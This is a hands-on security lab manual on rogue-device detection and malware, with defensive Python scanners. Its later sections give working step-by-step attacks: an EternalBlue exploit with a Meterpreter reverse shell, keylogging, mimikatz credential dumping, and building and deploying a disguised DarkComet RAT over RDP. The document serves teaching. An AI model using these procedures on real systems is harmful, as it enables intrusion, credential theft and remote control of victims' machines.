Detecting Malware and Unauthorized Devices
Introduction

Overview

The purpose of this lab is to understand the security risk associated with rogue devices and malware by learning active and passive scanning techniques. Students will also craft, deploy, and detect malware on a machine on a network.

Outcomes

In this lab, you will learn to:

1. Perform active and passive scanning using Nmap.
2. Detect rogue devices on the network using active and passive tools.
3. Craft, deploy, and detect malware.

Key Terms

Key Term     Description
Wireshark    A free and open-source protocol analyzer that allows a user to capture network traffic or to analyze a capture file.
Zenmap       A GUI front end for Nmap that allows you to scan for open ports and services.
Metasploit   A framework that contains exploits for various information systems.
nmap         A port scanner that indicates whether ports are open or closed on a remote system.
TCP          Transmission Control Protocol is a network protocol designed to send and ensure end-to-end delivery of data packets over the Internet.

Reading Assignment
Introduction

The purpose of this lab is to understand the security risk associated with rogue devices and malware by learning active and passive scanning techniques. Students will also craft, deploy, and detect malware on a machine on a network.

In this lab, you will learn to:

Perform active and passive scanning using Nmap.
Detect rogue devices on the network using active and passive tools.
Craft, deploy, and detect malware.

Figure 1 shows the lab topology. In the lab topology, you will learn how to detect the three rogue devices on the different networks.
ifconfig

The ifconfig command is a terminal tool in Linux that enumerates all the interfaces on a system. The ifconfig command is also used to configure interfaces on a Linux machine. In this lab, you will use the ifconfig command to find the three networks shown in Figure 1, which you will then scan actively and passively with Nmap and arp-scan.
Finding Rogue Devices with arp-scan and Nmap

Two ways to find rogue devices on the network are arp-scan and Nmap. Rogue devices are attached to your network without authorization, and they can be used to do it harm.

arp-scan is a command-line tool for system discovery and fingerprinting. It constructs and sends Address Resolution Protocol (ARP) requests to the specified Internet Protocol (IP) addresses and displays any responses that are received.

You can also use Nmap to do system discovery and fingerprinting. This lab explores both methods of locating rogue devices on the network.
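As an added example (not part of this lab and not code from arp-scan itself), the following Python script parses arp-scan output and compares the responding hosts with an inventory of authorized devices, which is how a defender turns the Network 1 sweep described above into a rogue-device alert. The arp-scan output and the MAC addresses are constructed for this example; the IP addresses are the lab's Network 1 hosts, and the inventory is assumed.

```python
import re
from typing import Dict, List, Tuple

# Constructed arp-scan output in its default "IP<TAB>MAC<TAB>Vendor" layout.  The IPs
# are the lab's Network 1 hosts; the MAC addresses are made up for this example.
SAMPLE_ARP_SCAN = """\
Interface: eth0, type: EN10MB, MAC: 00:0c:29:aa:bb:cc, IPv4: 192.168.1.50
192.168.1.1\t00:50:56:11:22:33\tVMware, Inc.
192.168.1.175\t00:0c:29:44:55:66\tVMware, Inc.
192.168.1.199\t08:00:27:77:88:99\tPCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.015 seconds (127.01 hosts/sec). 3 responded
"""

# Assumed authorized inventory for Network 1: IP -> (MAC, label).  The scanning Kali
# host (192.168.1.50) is assumed not to appear in its own results, so it is not listed.
INVENTORY: Dict[str, Tuple[str, str]] = {
    "192.168.1.1": ("00:50:56:11:22:33", "firewall"),
    "192.168.1.175": ("00:0c:29:44:55:66", "Windows 8.1 workstation"),
}

# One result row: dotted-quad IP, colon-separated MAC, optional vendor text.
_ROW = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s*(.*)$", re.I)


def parse_arp_scan(text: str) -> List[Tuple[str, str, str]]:
    """Return (ip, mac, vendor) per responding host; banner and summary lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            hosts.append((m.group(1), m.group(2).lower(), m.group(3).strip()))
    return hosts


def find_rogues(hosts, inventory) -> List[str]:
    """Unknown IPs are rogue devices; a known IP answering from another MAC is flagged
    too, since ARP alone cannot tell a replaced NIC from a spoofed or swapped host."""
    findings = []
    for ip, mac, vendor in hosts:
        if ip not in inventory:
            findings.append(f"ROGUE {ip} ({mac}, {vendor or 'unknown vendor'})")
        elif inventory[ip][0].lower() != mac:
            findings.append(f"MAC MISMATCH {ip}: expected {inventory[ip][0]}, saw {mac}")
    return findings


def missing_hosts(hosts, inventory) -> List[str]:
    """Inventory entries that did not answer: a host that is down, moved, or replaced."""
    seen = {ip for ip, _, _ in hosts}
    return [f"{ip} ({label})" for ip, (_, label) in inventory.items() if ip not in seen]


if __name__ == "__main__":
    live = parse_arp_scan(SAMPLE_ARP_SCAN)
    for finding in find_rogues(live, INVENTORY) + ["SILENT " + h for h in missing_hosts(live, INVENTORY)]:
        print(finding)
```

Feeding it real output is a matter of running arp-scan and piping its stdout into parse_arp_scan; the same inventory diff works on the host list from nmap -sP.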
Active, Passive, and Hybrid Scanning with Nmap
The three scanning techniques that are widely used by Nmap are active scanning, passive
scanning, and hybrid scanning. Active scanning is the technique where Nmap sends
packets to all the hosts on a network or subnet and waits for responses from them.
Passive scanning is done by examining packets sent from other nodes on a network or
subnet. Hybrid scanning is the technique where Nmap sends one or more initial packets
and then uses passive scanning to search for responses from the target host.
Wireshark—Capturing Packets

Wireshark is a network protocol analyzer. Its graphical user interface (GUI) is shown in Figure 2. It allows you to capture packets on your network and inspect the traffic passing over it. In this lab, you use Wireshark to capture and investigate packets to discover a rogue system on the network and the type of system it is.
Keyloggers
A keylogger program captures everything that a user enters on a computer keyboard.
Kali Linux/Metasploit
Kali Linux is a Linux distribution created for digital forensics and penetration testing.
Metasploit is a penetration testing framework which comes preloaded with Kali Linux. Kali
Linux, along with Metasploit, provides tools for penetration testers to improve security
assessments and awareness. This lab uses Kali and Metasploit to explore malware.
Meterpreter
Meterpreter is a Metasploit attack payload that provides an interactive shell to the victim
machine using Metasploit. In this lab, you will use keyscan_dump (keylogger) on a victim
computer to capture keystrokes.
Nmap/Zenmap

Nmap is an open-source network and port scanner used to discover hosts and open ports/services. Zenmap is the GUI for Nmap. Figure 3 shows the GUI for Zenmap.
Craft, Deploy, and Detect Malware

DarkComet is a Trojan horse, a type of malware that masquerades as a legitimate application to persuade a victim to install and/or launch it. Trojans spread through social engineering and brute-force hacking of systems. In this lab, you use a remote access Trojan (RAT) called DarkComet. DarkComet is command and control (often referred to as C&C) malware: it lets you create a plausible-looking application that acts as a server for the DarkComet client. Once the malware is installed, the DarkComet client can control the system remotely; it sends commands to the server, which has full access to the system to do what it wants. In this lab, you craft, deploy, and detect the DarkComet malware. You will detect the malware using Windows Defender on a Windows machine.
CONCLUSION:
In this lab, you will learn active and passive scanning techniques to detect rogue devices
using Nmap and arp-scan and also to craft DarkComet malware that will be detected with
Windows Defender.
Determining the Network Ranges

1. Click on the Kali Linux icon on the topology. Type root for the Username and click Next.

2. For the Password, type toor (root spelled backward) and click the Sign In button.

   Note: The password of toor will not be displayed when you type it for security purposes.

3. Click the black and white icon (second from the top) to launch the Linux terminal.

4. Type the following command to view all of the IP addresses. Press Enter.

   root@kali:~# ifconfig

CHALLENGE

This Kali system is connected to all three of the company's networks. Your job is to determine if any rogue machines are present on the network by using a combination of active and passive scanning tools.

5. Type the following command to view the IP address of the first network. Press Enter.

   root@kali:~# ifconfig eth0

6. Type the following command to view the IP address of the second network. Press Enter.

   root@kali:~# ifconfig eth1

7. Type the following command to view the IP address of the third network. Press Enter.

   root@kali:~# ifconfig eth2

Below is a summary of the three networks that your Kali system is connected to. The networks are:

Network      IP Range
Network 1    192.168.1.0/24
Network 2    172.16.1.0/24
Network 3    10.0.0.0/24

DISCUSSION QUESTIONS:

1. What is the command-line tool used to determine the networks to scan?

2. What is the third subnet you uncovered?
Active and Passive Scanning

First, we will focus on the first network segment, labeled Network 1:

1. Type the following command to view the IP address of the first network. Press Enter.

   root@kali:~# ifconfig eth0

2. Type the following command to verify that your device can ping the firewall on network segment 1. Press Enter.

   root@kali:~# ping 192.168.1.1 -c 4

3. Type the following command to verify that your device can ping the Windows 8.1 workstation on network segment 1. Press Enter.

   root@kali:~# ping 192.168.1.175 -c 4

We will now use arp-scan and Zenmap, two active scanning tools, to determine if any rogue devices exist on the network.

4. Type the following command to scan the Network 1 segment for active hosts. Press Enter.

   root@kali:~# arp-scan 192.168.1.0/24

Let's examine the results of the scan of network segment 1 in the chart below:

IP Address       Device
192.168.1.1      Firewall
192.168.1.175    Windows 8.1 Workstation
192.168.1.199    Rogue Device

The next thing we will do is determine more information about the rogue device detected on the network.

5. Type the following command to open Zenmap. Press Enter. After Zenmap opens, type 192.168.1.0/24 in the Target box and then click the Scan button to launch an intense scan.

   root@kali:~# zenmap

After the scan is complete, you will see three hosts listed in the left-hand pane.

6. Click on the fourth host (which is the rogue device) and click the Host Details pane. Notice that the device is running Linux and has not been turned on for long.

7. We will now save this scan on your local system so you can e-mail it to your supervisor. To save the scan, go to Scan on the menu bar and select Save Scan.

8. For the filename, type rogue_device_network1.xml and click the Save button.

9. Select Scan from the menu bar and then select Quit to close Zenmap.

Next, we will focus on the second network segment, labeled Network 2:

10. Type the following command to view the IP address of the second network. Press Enter.

    root@kali:~# ifconfig eth1

11. Type the following command to verify that your device can ping the Windows server on network segment 2. Press Enter.

    root@kali:~# ping 172.16.1.100 -c 4

We will now use nmap to perform an active scan to determine if any rogue devices exist on the network.

12. Type the following command to scan the Network 2 segment for active hosts. Press Enter.

    root@kali:~# nmap -sP 172.16.1.0/24

Let's examine the results of the scan of network segment 2 in the chart below:

IP Address       Device
172.16.1.100     Windows Server
172.16.1.50      Kali Linux

Note: No rogue devices were detected on the network using active scanning measures.

To avoid capturing traffic from other networks, we will shut the other two interfaces on Kali down.

13. Type the following command to shut down the interface connected to the first network. Press Enter.

    root@kali:~# ifconfig eth2 down

14. Type the following command to view all of the IP addresses. Press Enter. (Notice that only eth1 is listed.)

    root@kali:~# ifconfig

15. Type the following command and press Enter to open Wireshark.

    root@kali:~# wireshark

16. Select Capture from the Wireshark menu and choose Options.

17. Uncheck the box in front of any. Click Start.

After a short while, packets should start appearing in the packet list. According to the information they carry, there is a rogue system with the following details:

IP address: 169.254.1.101
Computer name: ROGUETWO-WIN10

It may take up to 10 minutes for the needed packet to appear.

18. Click the Stop button to stop the capture.

19. Click File and go to Quit to exit Wireshark. When prompted, choose Quit without Saving.

20. Type the following command to set the IP address to the same subnet as the rogue device. Press Enter.

    root@kali:~# ifconfig eth1 169.254.1.1

21. Type the following command to scan the device and determine the operating system. Press Enter.

    root@kali:~# nmap -O 169.254.1.101

The rogue device on Network 2 is running Windows 10. Next, we will focus on the third network segment, labeled Network 3:
To avoid capturing traffic from other networks, we will shut the other interfaces on Kali down.

22. Type the following command to shut down the interface connected to the second network. Press Enter.

    root@kali:~# ifconfig eth1 down

23. Type the following command to bring up the interface connected to the third network. Press Enter.

    root@kali:~# ifconfig eth2 up

24. Type the following command to view the IP address of the third network. Press Enter.

    root@kali:~# ifconfig eth2

25. Type the following command to view all of the IP addresses. Press Enter. (Notice that only eth2 is listed.)

    root@kali:~# ifconfig

26. Type the following command to verify that your device can ping the Windows 10 system on network segment 3. Press Enter.

    root@kali:~# ping 10.0.0.20 -c 4

We will now use nmap to perform an active scan to determine if any rogue devices exist on the network.

27. Type the following command to scan the Network 3 segment for active hosts. Press Enter.

    root@kali:~# nmap -sP 10.0.0.0/24

Let's examine the results of the scan of network segment 3 in the chart below:

IP Address       Device
10.0.0.20        Windows 10
10.0.0.50        Kali Linux

Note: No rogue devices were detected on the network using active scanning measures.

28. Type the following command and press Enter to open Wireshark.

    root@kali:~# wireshark

29. Select Capture from the Wireshark menu and choose Options.

30. Uncheck the box in front of any. Click Start.

After a short while, packets should start appearing in the packet list. According to the information they carry, there is a rogue system with the following details:

IP address: 169.254.2.202
Computer name: ROGUE3-WIN7

It may take up to 10 minutes for the needed packet to appear.

31. Click the Stop button to stop the capture.

32. Click File and go to Quit to exit Wireshark. When prompted, choose Quit without Saving.

33. Type the following command to set the IP address to the same subnet as the rogue device. Press Enter.

    root@kali:~# ifconfig eth2 169.254.2.1

34. Type the following command to scan the device and determine the operating system. Press Enter.

    root@kali:~# nmap -O 169.254.2.202

The rogue device on Network 3 is running Windows 7 SP 0.
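The two passive discoveries in this section (ROGUETWO-WIN10 on 169.254.1.101 and ROGUE3-WIN7 on 169.254.2.202) can be automated instead of read off the Wireshark packet list by eye. The Python script below is an added example, not part of the lab: it reads a Wireshark packet list exported as plain text, flags every source address outside the managed subnet, and collects the computer names those sources announce over NBNS and LLMNR. The packet rows are constructed to resemble the lab captures, with the Network 2 and Network 3 captures merged into one sample.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Constructed Wireshark packet list (File > Export Packet Dissections > As Plain Text)
# trimmed to the columns used here.  The 169.254.x.x rows mirror the two rogue hosts the
# lab finds passively on Networks 2 and 3; the other rows are filler from Network 2.
SAMPLE_PACKETS = """\
No.  Time      Source          Destination      Protocol  Info
1    0.000000  172.16.1.100    172.16.1.255     BROWSER   Host Announcement WINSERVER, Workstation, Server
2    1.204113  172.16.1.50     172.16.1.100     ICMP      Echo (ping) request
3    2.801220  169.254.1.101   169.254.255.255  NBNS      Registration NB ROGUETWO-WIN10<00>
4    3.115009  169.254.1.101   224.0.0.252      LLMNR     Standard query A ROGUETWO-WIN10
5    8.442871  169.254.2.202   169.254.255.255  NBNS      Registration NB ROGUE3-WIN7<20>
"""

APIPA = ipaddress.ip_network("169.254.0.0/16")  # range a Windows host self-assigns without DHCP

# Wireshark shows NBNS registrations as "Registration NB <name><suffix>" and LLMNR
# lookups of a host's own name as "Standard query A <name>"; both leak the computer name.
_NAME = re.compile(r"(?:Registration NB|Standard query A)\s+([A-Za-z0-9_\-]+)")


def parse_packets(text: str) -> List[Tuple[str, str, str]]:
    """Return (source, protocol, info) per data row; the header row is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 5)  # No., Time, Source, Destination, Protocol, Info
        if len(parts) == 6:
            rows.append((parts[2], parts[4], parts[5]))
    return rows


def passive_rogues(rows, managed_subnet: str) -> Dict[str, List[str]]:
    """Map every source IP outside the managed subnet to the host names it announced.

    Nothing is sent: this is the passive counterpart of the nmap -sP sweep, and it
    catches a host that never joined the managed subnet because it got no DHCP lease."""
    managed = ipaddress.ip_network(managed_subnet)
    found: Dict[str, set] = {}
    for src, _proto, info in rows:
        try:
            ip = ipaddress.ip_address(src)
        except ValueError:  # malformed row, e.g. a wrapped Info column
            continue
        if ip in managed:
            continue
        names = found.setdefault(src, set())
        m = _NAME.search(info)
        if m:
            names.add(m.group(1))
    return {ip: sorted(n) for ip, n in found.items()}


def is_apipa(ip: str) -> bool:
    """True when the address is link-local (169.254.0.0/16), i.e. the host got no DHCP lease."""
    return ipaddress.ip_address(ip) in APIPA


if __name__ == "__main__":
    for ip, names in passive_rogues(parse_packets(SAMPLE_PACKETS), "172.16.1.0/24").items():
        tag = "APIPA, no DHCP lease" if is_apipa(ip) else "off-subnet"
        print(f"{ip} [{tag}] announced names: {', '.join(names) or 'none seen'}")
```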
DISCUSSION QUESTIONS:

1. What is the command to use arp to determine a rogue device on a network?

2. What is the GUI version of nmap?

3. What is Wireshark?

Keyloggers
1. Type the following command to restart the system and reset all of the interfaces. Press Enter.

   root@kali:~# init 6

2. Click on the Kali Linux icon on the topology. Type root for the Username and click Next.

3. For the Password, type toor (root spelled backwards) and click the Sign In button.

   Note: The password of toor will not be displayed when you type it for security purposes.

4. Click the black and white icon (second from the top) to launch the Linux terminal.

5. Type the following command to view all of the IP addresses. Press Enter.

   root@kali:~# ifconfig

6. Type the following command to determine if the server is vulnerable to the EternalBlue exploit. Press Enter.

   root@kali:~# nmap -A 172.16.1.100

7. Type the following command to initialize the database for Metasploit. Press Enter.

   root@kali:~# msfdb init

8. Type the following command to start the Metasploit console. Press Enter.

   root@kali:~# msfconsole

9. Type the following command to use the EternalBlue exploit. Press Enter.

   msf5 > use exploit/windows/smb/ms17_010_psexec

10. Type the following command to set the local host. Press Enter.

    msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 172.16.1.50

11. Type the following command to set the remote host. Press Enter.

    msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.1.100

12. Type the following command to select the payload. Press Enter.

    msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp

13. Type the following command to exploit the target. Press Enter.

    msf5 exploit(windows/smb/ms17_010_psexec) > exploit

14. Type the following command within the meterpreter prompt to secure the appropriate level of access. Press Enter.

    meterpreter > getsystem

15. Type the following command within the meterpreter prompt to determine the level of access. Press Enter.

    meterpreter > getuid

16. Type the following command within the meterpreter prompt to list processes. Press Enter.

    meterpreter > ps

17. Click on the Windows Server icon in the network topology. After the machine finishes booting, click the Send Ctrl+Alt+Delete button in the upper right corner.

18. Log on as administrator with the password of P@ssw0rd and then click the arrow.

    Note: The password of P@ssw0rd will not be displayed when you type it for security purposes.

19. Double-click on the Command Prompt shortcut on the Windows Server desktop.

20. Switch back to the Kali machine. Type the following command within the meterpreter prompt to list processes. Press Enter.

    meterpreter > ps

21. Notice that the administrator is now listed. Find the first number to the right of the cmd.exe process.

    Note: The number will be different than the one displayed in the example.

22. Type the following command within the meterpreter prompt to migrate to the cmd.exe process. Press Enter.

    meterpreter > migrate 3792

    Note: The number will be different than the one displayed in the example.

23. Type the following command within the meterpreter prompt to determine the level of access. Press Enter.

    meterpreter > getuid

24. Type the following command within the meterpreter prompt to start the keylogger. Press Enter.

    meterpreter > keyscan_start

25. Switch back to the Windows server. Type the following command within the command prompt to view your IP address. Press Enter.

    C:\Windows\System32>ipconfig /all

26. Type the following command within the command prompt to view files and folders. Press Enter.

    C:\Windows\System32>dir c:\

27. Open Chrome on the desktop and visit the following URL: 127.0.0.1:2222.

28. Type an e-mail address and a password and then click Log In.

    Note: It is not the real Facebook page, so you can type anything you want.

29. Type the following command within the meterpreter prompt to dump the keystrokes captured by the keylogger. Press Enter.

    meterpreter > keyscan_dump

30. Type the following command within the meterpreter prompt to load mimikatz. Press Enter.

    meterpreter > load mimikatz

31. Type the following command within the meterpreter prompt to dump the passwords. Press Enter.

    meterpreter > kerberos

DISCUSSION QUESTIONS:

1. What is the name of the keylogger used to capture keystrokes on a machine?

2. What is meterpreter?

Examining Malware

Building and Deploying the Malware
1. Click on the Windows 8.1 icon on the topology.

2. Double-click on the Malware folder on the Windows 8.1 desktop.

3. Highlight the DarkComet.7z file within the Malware folder. Right-click it, choose 7-Zip, and select Extract to "DarkComet\".

4. Double-click on DarkComet.exe to launch the program.

5. Click Allow access when you receive a Windows Security Alert.

6. From the DarkComet-RAT menu bar, select Listen to new port (+Listen).

7. Type 443 in the Listen port box and click the Listen button.

8. From the DarkComet-RAT menu bar, click Server module (657.50KB), and then select Full editor (Expert).

9. Click on Network Settings. When this opens, for IP/DNS, type 192.168.1.175 (the IP address of the Windows 8.1 machine), and for Port, type 443 (almost always allowed out). Then click ADD.

10. Click Choose Icon from the list. Select Custom icon. Choose the Firefox icon.

11. Click Stub Finalization. For Compress Executable (Pack), select UPX (Ultimate Packer Executable). Click Build The Stub to create the malware payload.

12. Click the link to the Desktop. For the File name, type firefox and click the Save button.

13. You should see the firefox.exe malware on your desktop. Right-click on the file and select Copy.

14. Click on the X in the upper right-hand corner to close the Create a new stub program.

15. Double-click the cmd-Shortcut link on the external Windows 8.1 desktop.

16. Type the following command and press Enter to determine if RDP is open on the Windows Server.

    C:\>nmap 172.16.1.100 -p 3389

17. Type the following command and press Enter to launch the Microsoft Terminal Services Client.

    C:\>mstsc

If you recall, earlier we stole the password to the system.

18. In the Computer box, type 172.16.1.100 and then click the Connect button.

19. For the username, type administrator, and for the password, type P@ssw0rd. Click OK.

    Note: The password of P@ssw0rd will not be displayed when you type it for security purposes.

20. Click Yes on the Remote Desktop Connection warning screen.

The remote Windows 2008 R2 Server desktop will now be displayed on your machine.

21. Right-click on the Windows Server desktop you are connected to and click Paste.

22. Double-click on the malicious file.

The connection to the victim will be displayed in the DarkComet-RAT console.

23. Click the Minimize line on the 172.16.1.100 pane to minimize the Windows Server.

24. Type the following command and press Enter to determine if RDP is open on Windows 10.

    C:\>nmap 10.0.0.20 -p 3389

25. Type the following command and press Enter to launch the Microsoft Terminal Services Client.

    C:\>mstsc

If you recall, earlier we stole the password to the server, which is likely also used on the client.

26. In the Computer box, type 10.0.0.20 and then click the Connect button.

27. For the username, type administrator, and for the password, type P@ssw0rd. Click OK.

    Note: The password of P@ssw0rd will not be displayed when you type it for security purposes.

28. Click Yes on the Remote Desktop Connection warning screen.

The remote Windows 10 desktop will now be displayed on your machine.

29. Right-click on the Windows 10 desktop you are connected to and click Paste.

30. Click in the Windows Search Box and type Windows Defender. Click the Windows Defender app.

31. In Windows Defender, click the History tab and then click View details.

32. In Windows Defender, scroll down to view the malware name. Click the Remove all button.

DISCUSSION QUESTIONS:

1. What is the name of the malware that you crafted and deployed?

2. How was the malware detected on the Windows machine?

Note: Press the STOP button to complete the lab.